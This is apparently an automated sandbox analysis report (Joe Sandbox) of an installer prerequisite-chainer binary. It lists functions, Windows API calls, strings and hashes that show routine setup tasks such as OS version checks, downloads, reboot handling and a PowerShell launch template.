Instruction Fuzzy Hash: AE81B230D15616DBDB28DF28C888BA9F7B5BF45320F1483E9D42997291DB309DA5CF90

Function 002347C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,?), ref: 0023485D
FindClose.KERNEL32(00000000,?,?), ref: 002348BC

Part of subcall function 00213200: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,4938EAB5,00000000,0029B9F0,000000FF,?,?,002D3B80,?,0024D90C,80004005,4938EAB5,?,00000000), ref: 0021324A

Strings

!, xrefs: 00234865, 002348AD

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Find$AllocateCloseFileFirstHeap
String ID: !
API String ID: 1673784098-518105870
Opcode ID: ae2762581c66410f2ced8bb720d49590fb747d6dd6eda9eb06cf2dfc5660eca9
Instruction ID: 2e0367d31728bdfb239684a76610ae48aeeb9ef639468a9cd92981efaa127682
Opcode Fuzzy Hash: ae2762581c66410f2ced8bb720d49590fb747d6dd6eda9eb06cf2dfc5660eca9
Instruction Fuzzy Hash: 9531C1B1915255DBDB24EF14DC48BAAB7B4FF05324F2082AAE819A3380D7706D64CF91

Function 0027A15A Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,?,0024711E), ref: 0027A15F
HeapAlloc.KERNEL32(00000000), ref: 0027A166
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0027A1AC
HeapFree.KERNEL32(00000000), ref: 0027A1B3

Part of subcall function 00279FF8: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,0027A1A2), ref: 0027A01C
Part of subcall function 00279FF8: HeapAlloc.KERNEL32(00000000,?,0027A1A2), ref: 0027A023

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: d1d87b9e58848577b6c220a8b2909f61c061dbb0917c5320f8f0c98354882b07
Instruction ID: 16928cecea9c62c352b576e44038efb9e2f474ba23ec54f712db84f58e137bfa
Opcode Fuzzy Hash: d1d87b9e58848577b6c220a8b2909f61c061dbb0917c5320f8f0c98354882b07
Instruction Fuzzy Hash: ECF0E03211471297FF212B787C1DA6F3A59AFC67A1B12C429F45ED6150DE70CC518762

Function 0024BFE0 Relevance: 4.9, APIs: 3, Instructions: 388registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

RegCreateKeyA.ADVAPI32(80000001,00000001,?), ref: 0024C04E
RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,?), ref: 0024C066

Part of subcall function 00213200: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,4938EAB5,00000000,0029B9F0,000000FF,?,?,002D3B80,?,0024D90C,80004005,4938EAB5,?,00000000), ref: 0021324A

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0024C324

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Heap$AllocateCreateOpenProcessValue
String ID:
API String ID: 1583728613-0
Opcode ID: c637e8878481cfe3924b9b3dcc919e50d6e493fb248caa2afdafc69721050e9b
Instruction ID: b731795df275cf2c3f41390a9df5f5bc314882b4697bc31b2f92a16055fc5d4b
Opcode Fuzzy Hash: c637e8878481cfe3924b9b3dcc919e50d6e493fb248caa2afdafc69721050e9b
Instruction Fuzzy Hash: A4D1A272A112099FDB04DFA8CC44BAEFBB9FF49320F10826AE815E7391D7759914CB90

Function 0025E870 Relevance: 1.6, APIs: 1, Instructions: 95comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(002B9F6C,00000000,00000001,002C1584,000000B0,4938EAB5,00000098,00000000,?,000000A0,-00000010,002AA0DC,000000FF), ref: 0025E9C9

Part of subcall function 0027C537: EnterCriticalSection.KERNEL32(002D7FD4,?,00000000,?,002135E6,002D88D0,4938EAB5,00000000,?,0029BA2D,000000FF,?,0024D125,4938EAB5,?,00000000), ref: 0027C542
Part of subcall function 0027C537: LeaveCriticalSection.KERNEL32(002D7FD4,?,002135E6,002D88D0,4938EAB5,00000000,?,0029BA2D,000000FF,?,0024D125,4938EAB5,?,00000000), ref: 0027C57F

Part of subcall function 0027C4ED: EnterCriticalSection.KERNEL32(002D7FD4,00000000,?,00213657,002D88D0,002ACD30), ref: 0027C4F7
Part of subcall function 0027C4ED: LeaveCriticalSection.KERNEL32(002D7FD4,?,00213657,002D88D0,002ACD30), ref: 0027C52A
Part of subcall function 0027C4ED: RtlWakeAllConditionVariable.NTDLL ref: 0027C5A1

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionCreateInstanceVariableWake
String ID:
API String ID: 3308385226-0
Opcode ID: d2feb338a4ac5f9b3ec620760c38d69f7d030fd33cde6a7771355bef2f8343fd
Instruction ID: a68f3a553663f6ef53bb4c32536c71d577e2ea1e2a2203b984030a072f1082de
Opcode Fuzzy Hash: d2feb338a4ac5f9b3ec620760c38d69f7d030fd33cde6a7771355bef2f8343fd
Instruction Fuzzy Hash: AB410EB0A10340EFEB14DF28EC89F4AB7A0FB05711F244A69E9049B3D1C3B66D54CB5A

Function 0022AF50 Relevance: 46.3, APIs: 16, Strings: 10, Instructions: 755
threadregistrysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

Part of subcall function 0021C3E0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,?,00246B79,?), ref: 0021C41D
Part of subcall function 0021C3E0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,?,00246B79,?), ref: 0021C44E
Part of subcall function 0021C3E0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,?,?,00000000,00000000,00000000,?,?,00246B79,?), ref: 0021C485

CreateThread.KERNELBASE(00000000,00000000,Function_00047DF0,00000000,00000000,00000000), ref: 0022B0AC
GetLastError.KERNEL32 ref: 0022B0B9

Part of subcall function 002483A0: GetCurrentThreadId.KERNEL32 ref: 002483A9
Part of subcall function 002483A0: DestroyWindow.USER32(00000005), ref: 002483B8

WaitForSingleObject.KERNEL32(?,?), ref: 0022B0DF
GetExitCodeThread.KERNEL32(?,00000000), ref: 0022B0F9
TerminateThread.KERNEL32(?,00000000), ref: 0022B111
CloseHandle.KERNEL32(?), ref: 0022B11A
GetActiveWindow.USER32 ref: 0022B47E

Part of subcall function 00238250: InitializeCriticalSection.KERNEL32(002D8AF4,4938EAB5), ref: 0023828C
Part of subcall function 00238250: EnterCriticalSection.KERNEL32(?,4938EAB5), ref: 00238299
Part of subcall function 00238250: WriteFile.KERNEL32(00000000,?,00000000,00240B71,00000000), ref: 002382CB
Part of subcall function 00238250: FlushFileBuffers.KERNEL32(00000000,?,00000000,00240B71,00000000), ref: 002382D4
Part of subcall function 00238250: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,002BDB5C,00000001,?,00000000,00240B71,00000000), ref: 00238356
Part of subcall function 00238250: FlushFileBuffers.KERNEL32(00000000,?,00000000,00240B71,00000000), ref: 0023835F

SetLastError.KERNEL32(0000000E), ref: 0022B49B
CloseHandle.KERNEL32(?), ref: 0022B4B6
GetCurrentThreadId.KERNEL32 ref: 0022B4D4
EnterCriticalSection.KERNEL32(002DACD0), ref: 0022B4F1
LeaveCriticalSection.KERNEL32(002DACD0), ref: 0022B514
DialogBoxParamW.USER32(000000D8,00000000,Function_00038720,00000000), ref: 0022B531
CloseHandle.KERNEL32(?), ref: 0022B54E
CloseHandle.KERNEL32(?), ref: 0022B586
RegDeleteKeyA.ADVAPI32(80000001,?), ref: 0022B877

Strings

No prerequisite must be installed., xrefs: 0022B196
Reboot in Progress=, xrefs: 0022B773
Reboot was refused=, xrefs: 0022B6CA
Reboot was required=, xrefs: 0022B620
true, xrefs: 0022B5E1, 0022B64F, 0022B650, 0022B701, 0022B7A2, 0022B7A3
After running prerequisites we have:, xrefs: 0022B614
InterbootContext, xrefs: 0022AFA9, 0022AFB7
Starting installing prerequisites in basic UI mode., xrefs: 0022B35B
false, xrefs: 0022B5E6, 0022B6DB, 0022B781
Starting installing prerequisites in silent mode., xrefs: 0022B27A

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Thread$CloseCriticalFileHandleSection$BuffersByteCharCurrentEnterErrorFlushLastMultiWideWindowWrite$ActiveCodeCreateDeleteDestroyDialogExitFindHeapInitializeLeaveObjectParamProcessResourceSingleTerminateWait
String ID: Reboot in Progress=$ Reboot was refused=$ Reboot was required=$After running prerequisites we have:$InterbootContext$No prerequisite must be installed.$Starting installing prerequisites in basic UI mode.$Starting installing prerequisites in silent mode.$false$true
API String ID: 2893576875-478559164
Opcode ID: 89581fc44fa06c9cb3c27c0838e36e64c40d219efe211229a0f85b71cd48017b
Instruction ID: d888499484612323816b6b22735272ee1670b440e9764e7e7e8d19019f926f39
Opcode Fuzzy Hash: 89581fc44fa06c9cb3c27c0838e36e64c40d219efe211229a0f85b71cd48017b
Instruction Fuzzy Hash: 3B62ED7091024AEFDB15DFA8D848BDDBBF4AF05314F1482A9F819AB291DB709E18CF51

Function 0023C6E0 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 220
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 0023C750
RegQueryValueExW.KERNELBASE(00000000,ProductType,00000000,00000000,?), ref: 0023C78B
RegQueryValueExW.KERNELBASE(00000000,ProductSuite,00000000,00000000,?,?), ref: 0023C806
RegCloseKey.KERNELBASE(00000000), ref: 0023C9DE

Strings

Blade, xrefs: 0023C920
ProductSuite, xrefs: 0023C7FB
DataCenter, xrefs: 0023C8EF
Storage Server, xrefs: 0023C965
SYSTEM\CurrentControlSet\Control\ProductOptions, xrefs: 0023C746
WinNT, xrefs: 0023C791
CommunicationServer, xrefs: 0023C88B
ServerNT, xrefs: 0023C7B4
Small Business, xrefs: 0023C840
Terminal Server, xrefs: 0023C8A4
Compute Server, xrefs: 0023C97C
Security Appliance, xrefs: 0023C94E
BackOffice, xrefs: 0023C872
Embedded(Restricted), xrefs: 0023C937
ProductType, xrefs: 0023C780
Personal, xrefs: 0023C909
Enterprise, xrefs: 0023C859
Small Business(Restricted), xrefs: 0023C8BD
EmbeddedNT, xrefs: 0023C8D6

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT
API String ID: 1586453840-3149529848
Opcode ID: a9e2c11f8f4bbfd1137ef26c3a9d227f9e81a838b6e25b7ae3d5aee293fae0eb
Instruction ID: 6bd3429c16334684b46e9c2abf0821e0aced5639b8d63dbe4377de7f580a11bc
Opcode Fuzzy Hash: a9e2c11f8f4bbfd1137ef26c3a9d227f9e81a838b6e25b7ae3d5aee293fae0eb
Instruction Fuzzy Hash: A171D3B07303199ADF219F20CC447FA73A9AB50784F314475E946BB682FA74DEB58B41

Function 0023C360 Relevance: 37.0, APIs: 12, Strings: 9, Instructions: 224
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 0023C3CE
RegQueryValueExW.KERNELBASE(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 0023C415
RegQueryValueExW.KERNELBASE(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 0023C434
RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 0023C463
RegQueryValueExW.KERNELBASE(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 0023C4D8
RegQueryValueExW.KERNELBASE(00000000,ReleaseId,00000000,00000000,?,?), ref: 0023C551
RegQueryValueExW.KERNELBASE(00000000,CSDVersion,00000000,00000000,?,?), ref: 0023C5A2
GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 0023C636
GetProcAddress.KERNEL32(00000000), ref: 0023C63D
GetCurrentProcess.KERNEL32(?), ref: 0023C674
IsWow64Process.KERNEL32(00000000), ref: 0023C67B
RegCloseKey.ADVAPI32(00000000), ref: 0023C6B5

Strings

CurrentMajorVersionNumber, xrefs: 0023C40A
Software\Microsoft\Windows NT\CurrentVersion, xrefs: 0023C3C4
kernel32, xrefs: 0023C631
CSDVersion, xrefs: 0023C597
IsWow64Process, xrefs: 0023C62C
CurrentMinorVersionNumber, xrefs: 0023C429
CurrentBuildNumber, xrefs: 0023C4CD
ReleaseId, xrefs: 0023C546
CurrentVersion, xrefs: 0023C458

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: QueryValue$Process$AddressCloseCurrentHandleModuleOpenProcWow64
String ID: CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32
API String ID: 2654979339-3583743485
Opcode ID: 8ded9bacc8411fd3fbfa855bebaa1605079f488bb7d6f457dae82ec4372d667b
Instruction ID: cf98f6f539fafa0d28e449ddbe3bb50c8ce98e4a88ca053138e5f6e059d779f6
Opcode Fuzzy Hash: 8ded9bacc8411fd3fbfa855bebaa1605079f488bb7d6f457dae82ec4372d667b
Instruction Fuzzy Hash: E3919DB1D112299EDF20CF20DC49FE9B7B9EB44711F1042A6E409B7290EB75AEA4CF51

Function 0024CF30 Relevance: 25.3, APIs: 5, Strings: 9, Instructions: 805fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00238250: InitializeCriticalSection.KERNEL32(002D8AF4,4938EAB5), ref: 0023828C
Part of subcall function 00238250: EnterCriticalSection.KERNEL32(?,4938EAB5), ref: 00238299
Part of subcall function 00238250: WriteFile.KERNEL32(00000000,?,00000000,00240B71,00000000), ref: 002382CB
Part of subcall function 00238250: FlushFileBuffers.KERNEL32(00000000,?,00000000,00240B71,00000000), ref: 002382D4
Part of subcall function 00238250: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,002BDB5C,00000001,?,00000000,00240B71,00000000), ref: 00238356
Part of subcall function 00238250: FlushFileBuffers.KERNEL32(00000000,?,00000000,00240B71,00000000), ref: 0023835F

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000), ref: 0024D478
CloseHandle.KERNEL32(00000000,?,00000000), ref: 0024D49F
GetFileSize.KERNEL32(00000000,00000000,?,00000000), ref: 0024D4AC
CloseHandle.KERNEL32(00000000,?,00000000), ref: 0024D4C4

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

Part of subcall function 002373A0: FormatMessageW.KERNEL32(00001300,00000000,00000008,00000400,00000001,00000000,00000000,4938EAB5,?,00000001), ref: 002373EB
Part of subcall function 002373A0: GetLastError.KERNEL32 ref: 002373F5

DeleteFileW.KERNEL32(?), ref: 0024D83D

Strings

Download failed. Error:, xrefs: 0024D64E
Download completed succesfully., xrefs: 0024D409
Download was canceled., xrefs: 0024D7E3, 0024EAD7
open, xrefs: 0024DAF6
Downloaded file was rejected.(Invalid size or MD5)., xrefs: 0024D86F
Starting download of:, xrefs: 0024D33B
Downloaded file was accepted., xrefs: 0024D5AB
[InternetShortcut]URL=%s, xrefs: 0024DA7C
Launching URL:, xrefs: 0024DF69

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: File$BuffersCloseCriticalFlushHandleSectionWrite$CreateDeleteEnterErrorFormatHeapInitializeLastMessageProcessSize
String ID: Download completed succesfully.$Download failed. Error:$Download was canceled.$Downloaded file was accepted.$Downloaded file was rejected.(Invalid size or MD5).$Launching URL:$Starting download of:$[InternetShortcut]URL=%s$open
API String ID: 3716865744-276716467
Opcode ID: b3bd01c62ed50a88333f8a7b5f18216275bb35d31d17b82d4f4bf65a85395a8b
Instruction ID: 5860e53f6afcceea2eb094cf0f2cb90e00ea7e8865c9fcfdd2e949b1fcb677e0
Opcode Fuzzy Hash: b3bd01c62ed50a88333f8a7b5f18216275bb35d31d17b82d4f4bf65a85395a8b
Instruction Fuzzy Hash: 9562BE70A1120ADFDB08DF68C884BADBBF1AF45314F1481A9F8199B292DB70ED55CF90

Function 00213FA0 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 260
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W,00000000), ref: 00214097
GetProcAddress.KERNEL32(00000000), ref: 0021409E
GetWindowsDirectoryW.KERNEL32(?,00000104,4938EAB5,?,00000000), ref: 002140E1
PathFileExistsW.KERNELBASE(?), ref: 00214109
CreateDirectoryW.KERNEL32(?,?,S-1-5-32-544,?,00000001,S-1-5-18,?,00000001), ref: 0021418C

Part of subcall function 0027C537: EnterCriticalSection.KERNEL32(002D7FD4,?,00000000,?,002135E6,002D88D0,4938EAB5,00000000,?,0029BA2D,000000FF,?,0024D125,4938EAB5,?,00000000), ref: 0027C542
Part of subcall function 0027C537: LeaveCriticalSection.KERNEL32(002D7FD4,?,002135E6,002D88D0,4938EAB5,00000000,?,0029BA2D,000000FF,?,0024D125,4938EAB5,?,00000000), ref: 0027C57F

GetTempPathW.KERNEL32(00000104,?,4938EAB5,?,00000000), ref: 002141AF

Part of subcall function 0027C4ED: EnterCriticalSection.KERNEL32(002D7FD4,00000000,?,00213657,002D88D0,002ACD30), ref: 0027C4F7
Part of subcall function 0027C4ED: LeaveCriticalSection.KERNEL32(002D7FD4,?,00213657,002D88D0,002ACD30), ref: 0027C52A
Part of subcall function 0027C4ED: RtlWakeAllConditionVariable.NTDLL ref: 0027C5A1

Strings

Kernel32.dll, xrefs: 00214092
URL, xrefs: 00213FA0, 0021434D
\SystemTemp\, xrefs: 002140E7
`j-, xrefs: 00214216
S-1-5-18, xrefs: 0021412C
S-1-5-32-544, xrefs: 0021413F
GetTempPath2W, xrefs: 0021408D

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$DirectoryEnterLeavePath$AddressConditionCreateExistsFileHandleModuleProcTempVariableWakeWindows
String ID: GetTempPath2W$Kernel32.dll$S-1-5-18$S-1-5-32-544$URL$\SystemTemp\$`j-
API String ID: 573185392-106810515
Opcode ID: 1113bbdd5290d25b707e0e11d30243fb7a9bc6b0af8157b12701466382293423
Instruction ID: 65b5ce2313c485f4515de9b18b5f2a7d2d53c6f36a02d374bdfaad7e36b68d75
Opcode Fuzzy Hash: 1113bbdd5290d25b707e0e11d30243fb7a9bc6b0af8157b12701466382293423
Instruction Fuzzy Hash: DCA1B5B1D20218EBDB20EFA4ED49BEDB7F4EB18310F14419AE509A7281EB745E94CF51

Function 002419A0 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 410
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00250A80: GetSystemDefaultLangID.KERNEL32(4938EAB5,?,00000000,?,000000C9), ref: 00250AB6

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 00241B03
GetProcAddress.KERNEL32(00000000), ref: 00241B0A
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000), ref: 00241B40

Strings

Searching for:, xrefs: 00241BF9
kernel32, xrefs: 00241AFE
Undefined, xrefs: 00241DDA
Search result:, xrefs: 00241D79
Wrong OS or Os language for:, xrefs: 00241E6B
Not selected for install., xrefs: 00241DF3, 00241DF4
IsWow64Process2, xrefs: 00241AF9

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AddressCurrentDefaultHandleLangModuleProcProcessSystem
String ID: IsWow64Process2$Not selected for install.$Search result:$Searching for:$Undefined$Wrong OS or Os language for:$kernel32
API String ID: 323535258-4272450043
Opcode ID: a7b68536c0732ec5f1e5e3d5e1d5813a08a8369eac05fa59601acb4c3ae86e86
Instruction ID: ca35e90348f1af2170f7371f45b8c3a3b3a233e596742d627d540995e3610705
Opcode Fuzzy Hash: a7b68536c0732ec5f1e5e3d5e1d5813a08a8369eac05fa59601acb4c3ae86e86
Instruction Fuzzy Hash: 5EF19070A20605DFDB18DFA8C894BAEB7F1FF44314F148259E4269B291DB70ADA6CF41

Function 002474D0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 307
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempFileNameW.KERNELBASE(00000000,AI_,00000000,?,-00000010,?,?,?,?,?,?,?,?,?,002A5BBD,000000FF), ref: 002475BD
DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,002A5BBD,000000FF), ref: 00247601
_wcsrchr.LIBVCRUNTIME ref: 00247654

Strings

-NoProfile -NonInteractive -NoLogo -ExecutionPolicy %s -Command "%s", xrefs: 00247705
.ps1, xrefs: 00247625, 00247637, 00247641
%s -paths %s -retry_count %d, xrefs: 002476CE
RemoteSigned, xrefs: 00247700
AI_, xrefs: 002475B7

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: File$DeleteNameTemp_wcsrchr
String ID: %s -paths %s -retry_count %d$-NoProfile -NonInteractive -NoLogo -ExecutionPolicy %s -Command "%s"$.ps1$AI_$RemoteSigned
API String ID: 2635186422-656004915
Opcode ID: e295c41881d48dc1ee45d59083b3972e40f0b3d0e4d703a051ba6b29429326b3
Instruction ID: a0915f10b685f3a41e1c3aab0cdb64ad84acc769d0a449c4e378640ebd740b31
Opcode Fuzzy Hash: e295c41881d48dc1ee45d59083b3972e40f0b3d0e4d703a051ba6b29429326b3
Instruction Fuzzy Hash: E7B1C470910505DFDB04DFA8CC49BAEBBB5EF55310F188298E825AB292EB74DE15CF90

Function 002470B0 Relevance: 15.2, APIs: 10, Instructions: 173
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 002470EA
SetLastError.KERNEL32(0000000E), ref: 00247127
GetCurrentThreadId.KERNEL32 ref: 002471B2
SetWindowTextW.USER32(?,00000000), ref: 00247235
GetDlgItem.USER32(?,000003E9), ref: 0024723F
SetWindowTextW.USER32(00000000,?), ref: 0024724B

Part of subcall function 00248410: GetDlgItem.USER32(?,00000002), ref: 00248430
Part of subcall function 00248410: GetWindowRect.USER32(00000000,?), ref: 00248446
Part of subcall function 00248410: ShowWindow.USER32(00000000,00000000,?,?,?,?,0024710A), ref: 0024845F
Part of subcall function 00248410: InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,0024710A), ref: 0024846A
Part of subcall function 00248410: GetDlgItem.USER32(00000000,000003E9), ref: 0024847C
Part of subcall function 00248410: GetWindowRect.USER32(00000000,?), ref: 00248492
